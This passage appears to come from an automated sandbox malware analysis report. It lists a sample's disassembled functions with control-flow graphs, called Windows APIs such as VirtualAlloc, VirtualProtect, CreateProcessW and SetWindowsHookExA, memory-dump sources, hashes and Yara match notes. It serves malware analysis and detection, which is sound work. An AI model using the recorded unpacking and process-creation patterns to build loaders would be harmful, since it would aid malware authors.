                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CreateHandleInformation
                                                                  • String ID: J$e?M:$e?M:$.#v$Ei${
                                                                  • API String ID: 3667790775-1658071454
                                                                  • Opcode ID: 74aeeec8adc3b2dc327feabe0ad49e3c2ce6a6fd602748faf8848a543ad8ebec
                                                                  • Instruction ID: d53893d64f301f81dbc8427f9fdaad2d4ab3494493649292dd798a4fb55a8586
                                                                  • Opcode Fuzzy Hash: 74aeeec8adc3b2dc327feabe0ad49e3c2ce6a6fd602748faf8848a543ad8ebec
                                                                  • Instruction Fuzzy Hash: FB819172A183019FC318DFE5A49863BB6E6ABC4748F004D2DF556D7258EB70D9488B93
                                                                  Function 0042A134 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 449 42a134-42a17d call 4295d4 GetModuleFileNameA 452 42a183 call 425d8a 449->452 453 42a17f-42a181 449->453 455 42a188-42a19a PathFindExtensionA 452->455 453->452 453->455 456 42a1a1-42a1bd call 42a105 455->456 457 42a19c call 425d8a 455->457 461 42a1c4-42a1c9 456->461 462 42a1bf call 425d8a 456->462 457->456 464 42a1db-42a1de 461->464 465 42a1cb-42a1d8 call 40f132 461->465 462->461 467 42a1e0-42a1ee call 42453c 464->467 468 42a209-42a212 464->468 465->464 473 42a1f3-42a1f5 467->473 469 42a214-42a218 468->469 470 42a245-42a248 468->470 474 42a221 469->474 475 42a21a-42a21f 469->475 476 42a24a-42a269 lstrcatA call 40f132 470->476 477 42a26c-42a281 call 40ea18 470->477 478 42a1f7-42a1fb 473->478 479 42a1fd 473->479 481 42a226-42a242 lstrcpyA call 40f132 474->481 475->481 476->477 484 42a200-42a206 call 40f132 478->484 479->484 481->470 484->468
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                  • PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                  • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                  • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ExtensionFileFindModuleNamePathlstrcatlstrcpy
                                                                  • String ID: .CHM$.HLP$.INI
                                                                  • API String ID: 2140653559-4017452060
                                                                  • Opcode ID: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction ID: bd75d3f52a36107bd73cc6bad142ef63f8b4208a48895ac81a5cbf6014c068f0
                                                                  • Opcode Fuzzy Hash: 1f62230ddda9a0eead22fd259ae79f4ed6fab4bf6a31e99d3694113894dfedf5
                                                                  • Instruction Fuzzy Hash: 19418C71600758DFCB30EFAAEC44ADA77E8EB08314F50482BE986D6241DB389955CF29
                                                                  Function 0042A282 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 490 42a282-42a2ae SetErrorMode * 2 call 4295d4 * 2 495 42a2b0-42a2c3 call 42a134 490->495 496 42a2c8-42a2d2 call 4295d4 490->496 495->496 500 42a2d4 call 41f835 496->500 501 42a2d9-42a2e6 496->501 500->501 504 42a2e8-42a2f4 GetProcAddress 501->504 505 42a2f9-42a2fc 501->505 504->505
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE(00000000,00000000,00425BE7,?,?,?,?,76230A60,00000000,?,0040E996,00000000), ref: 0042A28B
                                                                  • SetErrorMode.KERNELBASE(00000000,?,0040E996,00000000), ref: 0042A293
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,0040E996,00000000), ref: 0042A2DE
                                                                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042A2EE
                                                                    • Part of subcall function 0042A134: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 0042A175
                                                                    • Part of subcall function 0042A134: PathFindExtensionA.KERNELBASE(?), ref: 0042A18F
                                                                    • Part of subcall function 0042A134: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042A229
                                                                    • Part of subcall function 0042A134: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042A256
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                  • String ID: NotifyWinEvent$`#vp,$v$user32.dll
                                                                  • API String ID: 4004864024-19817718
                                                                  • Opcode ID: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction ID: 1aae1a9dc3cd045b93222ce5a26779434126d71d87e6cd8d5dbcd172a642732a
                                                                  • Opcode Fuzzy Hash: 458393a66d8bd0e2f0924bc2239fc2bb7060a4c2f2eaa8a22abf50ff16afb230
                                                                  • Instruction Fuzzy Hash: 9701A2717002219FD724EF21A809A593BA8AF04300F4984AFF445D73A2DB38C880CF7A
                                                                  Function 004254C2 Relevance: 12.0, APIs: 8, Instructions: 38COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004254CF
                                                                  • GetSystemMetrics.USER32(0000000C), ref: 004254D6
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004254DD
                                                                  • GetSystemMetrics.USER32(00000003), ref: 004254E7
                                                                  • GetDC.USER32(00000000), ref: 004254F1
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00425502
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042550A
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00425512
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                  • String ID:
                                                                  • API String ID: 1031845853-0
                                                                  • Opcode ID: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction ID: 6a1c861a32fe4ac7800512cecdb92344e909a3b8a9975da52ba67c4561c5568e
                                                                  • Opcode Fuzzy Hash: b06320392e429a04cf71825453b5b9399e0fdba567c3017782f8956d99a1d2f7
                                                                  • Instruction Fuzzy Hash: A6F01D71A40704AEE720AF729C89F277BA4EB81B51F11493AF6418B2D0D6B598068F54
                                                                  Function 022630D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 507 22630d0-22630e6 508 22630ea-22630ef 507->508 509 22630f0-22630f5 508->509 510 22631ac-22631b1 509->510 511 22630fb 509->511 512 2263226-22632b0 510->512 513 22631b3-22631b8 510->513 514 2263101-2263106 511->514 515 2263198-226319c 511->515 512->509 518 22631ec-22631f4 513->518 519 22631ba-22631bf 513->519 520 22632b5-22632bd 514->520 521 226310c-2263111 514->521 516 22631a2-22631a7 515->516 517 2263303-226330d 515->517 516->509 526 22631f6-226320e call 2263f20 call 2263e80 518->526 527 2263214-2263221 518->527 524 22631d4-22631d9 519->524 525 22631c1-22631cf 519->525 522 22632bf-22632d7 call 2263f20 call 2263e80 520->522 523 22632dd-2263300 520->523 528 2263113-2263118 521->528 529 226312e-2263135 521->529 522->523 523->517 524->509 533 22631df-22631e9 524->533 525->509 526->527 527->508 528->524 535 226311e-226312c call 2263d10 528->535 530 2263137-226314d call 2263f20 call 2263e80 529->530 531 2263152-226315d 529->531 530->531 549 226315f-2263175 call 2263f20 call 2263e80 531->549 550 226317a-2263188 RtlAllocateHeap 531->550 535->508 549->550 550->517 552 226318e-2263193 550->552 552->508
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000228), ref: 02263182
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID: &$B$S=
                                                                  • API String ID: 1279760036-3580750612
                                                                  • Opcode ID: c176824edb98fbd5e41360c12f106041cc9bf0535de45a03b62b05812e7c86b1
                                                                  • Instruction ID: 8231352bf0b12ad33a82a38a067525dafc8c8b0f772f9d61ba66f344beea1211
                                                                  • Opcode Fuzzy Hash: c176824edb98fbd5e41360c12f106041cc9bf0535de45a03b62b05812e7c86b1
                                                                  • Instruction Fuzzy Hash: 7C51D473B183029BC718DEE4949C53AB7E6FBD4A44F14489EE045CB258DBB0D9898BD2
                                                                  Function 02264BA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 87processCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 02264C21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID: D$.#v$Ei
                                                                  • API String ID: 963392458-2687700827
                                                                  • Opcode ID: d3c61979f1b613f964d13664390a4fdd1be7395942c843eaed0d696bd761c979
                                                                  • Instruction ID: bba6bad19ddb47d038aacaf14ef77005df471ce0ac79f0d5c0276b4fdd660a36
                                                                  • Opcode Fuzzy Hash: d3c61979f1b613f964d13664390a4fdd1be7395942c843eaed0d696bd761c979
                                                                  • Instruction Fuzzy Hash: B321B637B113026BD714EBF4AC58B7A37A3AFC0640F104819F585C7284EFB0D8458791
                                                                  Function 004281D2 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 590 4281d2-428200 591 428206 590->591 592 42828e-42829b RegCloseKey 590->592 593 428207-42821d RegOpenKeyExA 591->593 594 428276-428287 RegCloseKey 593->594 595 42821f-428222 593->595 594->593 596 42828d 594->596 597 428270-428274 595->597 596->592 597->594 598 428224-42823d RegQueryValueExA 597->598 599 428260-42826d 598->599 600 42823f-428243 598->600 599->597 600->599 601 428245-42824e 600->601 602 428250-428256 601->602 603 428258-42825a 601->603 602->599 603->599
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(80000001,0043B2A4,00000000,00000001,?), ref: 00428215
                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 00428235
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00428279
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0042828F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Close$OpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 1607946009-0
                                                                  • Opcode ID: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction ID: fa71898e03329bcf94aa1d3a20f1a241a73731d4e52d53b435c0548dfa0eec47
                                                                  • Opcode Fuzzy Hash: 65fa2c3f979de50099cc2811b2363345d5be31521dc93f030b08f37819c87299
                                                                  • Instruction Fuzzy Hash: 9E216AB1E01228EFDF15CF96D848AAEBBF8FF94314F5040AEE405A6211DB745A01CF29
                                                                  Function 021C002D Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 659 21c002d-21c009e call 21c0456 * 6 672 21c00a7-21c00b0 659->672 673 21c00a0-21c00a2 659->673 672->673 675 21c00b2-21c00b6 672->675 674 21c044e-21c0455 673->674 675->673 676 21c00b8-21c00c2 675->676 677 21c00e4-21c0105 GetNativeSystemInfo 676->677 678 21c00c4-21c00c7 676->678 677->673 679 21c0107-21c012d VirtualAlloc 677->679 680 21c00c9-21c00cf 678->680 683 21c012f-21c0133 679->683 684 21c0162-21c016c 679->684 681 21c00d6 680->681 682 21c00d1-21c00d4 680->682 685 21c00d9-21c00e2 681->685 682->685 686 21c0135-21c0138 683->686 687 21c016e-21c0173 684->687 688 21c01a4-21c01b5 684->688 685->677 685->680 692 21c013a-21c0142 686->692 693 21c0153-21c0155 686->693 689 21c0177-21c018a 687->689 690 21c0234-21c0240 688->690 691 21c01b7-21c01d1 688->691 694 21c018c-21c0193 689->694 695 21c0199-21c019e 689->695 696 21c0246-21c025d 690->696 697 21c02f0-21c02fa 690->697 712 21c0222-21c022e 691->712 713 21c01d3 691->713 692->693 698 21c0144-21c0147 692->698 699 21c0157-21c015c 693->699 694->694 700 21c0195 694->700 695->689 703 21c01a0 695->703 696->697 704 21c0263-21c0273 696->704 701 21c0300-21c0307 697->701 702 21c03b2-21c03c7 call 21f27b0 697->702 706 21c014e-21c0151 698->706 707 21c0149-21c014c 698->707 699->686 708 21c015e 699->708 700->695 709 21c0309-21c0312 701->709 734 21c03c9-21c03ce 702->734 703->688 710 21c02d5-21c02e6 704->710 711 21c0275-21c0279 704->711 706->699 707->693 707->706 708->684 716 21c0318-21c0333 709->716 717 21c03a7-21c03ac 709->717 710->704 714 21c02ec 710->714 718 21c027a-21c0289 711->718 712->691 715 21c0230 712->715 719 21c01d7-21c01db 713->719 714->697 715->690 721 21c034d-21c034f 716->721 722 21c0335-21c0337 716->722 717->702 717->709 723 21c028b-21c028f 718->723 724 21c0291-21c029a 718->724 725 21c01dd 719->725 726 21c01fb-21c0204 719->726 731 21c0368-21c036a 721->731 732 21c0351-21c0353 721->732 727 21c0339-21c033e 722->727 728 21c0340-21c0343 722->728 723->724 729 21c029c-21c02a1 723->729 730 21c02c3-21c02c7 724->730 725->726 733 21c01df-21c01f9 725->733 742 21c0207-21c021c 726->742 737 21c0345-21c034b 727->737 728->737 738 21c02b4-21c02b7 729->738 739 21c02a3-21c02b2 729->739 730->718 745 21c02c9-21c02d1 730->745 735 21c036c 731->735 736 21c0371-21c0376 731->736 740 21c0359-21c035b 732->740 741 21c0355-21c0357 732->741 733->742 743 21c044c 734->743 744 21c03d0-21c03d4 734->744 747 21c036e-21c036f 735->747 748 21c0379-21c0380 736->748 737->748 738->730 749 21c02b9-21c02bf 738->749 739->730 740->731 750 21c035d-21c035f 740->750 741->747 742->719 746 21c021e 742->746 743->674 744->743 751 21c03d6-21c03e0 744->751 745->710 746->712 747->748 753 21c0388-21c039d VirtualProtect 748->753 754 21c0382 748->754 749->730 750->748 755 21c0361-21c0366 750->755 751->743 752 21c03e2-21c03e6 751->752 752->743 756 21c03e8-21c03f9 752->756 753->673 757 21c03a3 753->757 754->753 755->748 756->743 758 21c03fb-21c0400 756->758 757->717 759 21c0402-21c040f 758->759 759->759 760 21c0411-21c0415 759->760 761 21c042d-21c0433 760->761 762 21c0417-21c0429 760->762 761->743 764 21c0435-21c044b 761->764 762->758 763 21c042b 762->763 763->743 764->743
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,021C0005), ref: 021C00E9
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,021C0005), ref: 021C0111
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113709625.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21c0000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocInfoNativeSystemVirtual
                                                                  • String ID:
                                                                  • API String ID: 2032221330-0
                                                                  • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction ID: 10b205524862d1537b6e42184a6caad32ee4480a3d896e070fb0f1779713c314
                                                                  • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                                                  • Instruction Fuzzy Hash: E7D1D179A88306CFD714CF69C88076AB3E1FFA8318F29452DE8958B341E774E855CB91
                                                                  Function 022636B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteFile
                                                                  • String ID: Ei
                                                                  • API String ID: 4033686569-3988083245
                                                                  • Opcode ID: 4477d947eb3242f3d060ac2965775bc7e64820b2fa5a836bb1eebe5f731d0b45
                                                                  • Instruction ID: 1983b8e0d0d96037170a2385f9700fa33540784ddc0bee1066fe46c5828397c6
                                                                  • Opcode Fuzzy Hash: 4477d947eb3242f3d060ac2965775bc7e64820b2fa5a836bb1eebe5f731d0b45
                                                                  • Instruction Fuzzy Hash: FB118277F513016BD714F7F5A8ACA7B3197ABC4A44B0448ACE416CB248EE74C8518BE1
                                                                  Function 0040DDBD Relevance: 3.0, APIs: 2, Instructions: 34memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 0040DDDF
                                                                    • Part of subcall function 004108E8: EnterCriticalSection.KERNEL32(?,?,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00410910
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00431A20,0000000C,0040DE48,000000E0,0040DE73,?,0041086B,00000018,00431B30,00000008,00410901,?,?), ref: 0040DE20
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCriticalEnterHeapSection__lock
                                                                  • String ID:
                                                                  • API String ID: 409319249-0
                                                                  • Opcode ID: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction ID: cb3ef9c9b0d75a7fffe9d60d5eea93ecefce8f5efa7861fcc474e081dc08dee6
                                                                  • Opcode Fuzzy Hash: 0be4bc3f3b2008a58ca10510bab6c21abc707aaf6d34d0de6824ed3c22b2e4db
                                                                  • Instruction Fuzzy Hash: 30F0C231D41A14A7DB20BFA1EC0675E7B30AB25728F20023BE9143A2E1C73C299986CC
                                                                  Function 00410933 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040E8E0,00000001,?,00431A70,00000060), ref: 00410944
                                                                    • Part of subcall function 00410984: HeapAlloc.KERNEL32(00000000,00000140,0041096C,000003F8,?,00431A70,00000060), ref: 00410991
                                                                  • HeapDestroy.KERNEL32(?,00431A70,00000060), ref: 00410977
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction ID: 644ccde18484a5878455bc069f2a0ce95f43452f64f7cc8ffed50bff23627854
                                                                  • Opcode Fuzzy Hash: 0c262e1b3af968b4c6dfc27b1994cb5ebb7051e99d81131d6ad7a3e46444b815
                                                                  • Instruction Fuzzy Hash: E7E09AF1BB03089AFB206B716C1876676A4EB44346F10483BF240C82A2EFB8D5C19A0C
                                                                  Function 0041F835 Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0041F848
                                                                  • SetWindowsHookExA.USER32(000000FF,0041F6B7,00000000,00000000), ref: 0041F858
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CurrentHookThreadWindows
                                                                  • String ID:
                                                                  • API String ID: 1904029216-0
                                                                  • Opcode ID: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction ID: 92535d9c526e6fa1784d7b0884afd0ec4ee71ce80cfdde11631e7970a4356ca2
                                                                  • Opcode Fuzzy Hash: 701a3d6a2974d6ff03211ac8c2448b0ce0685527336f7c5a3be3efa98d3f99a2
                                                                  • Instruction Fuzzy Hash: 32D05E72B042606EDB217B72BC09B553A845B00320F9806AAF411911D2C7288C834B6E
                                                                  Function 02265CA0 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(00000000), ref: 02265CCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
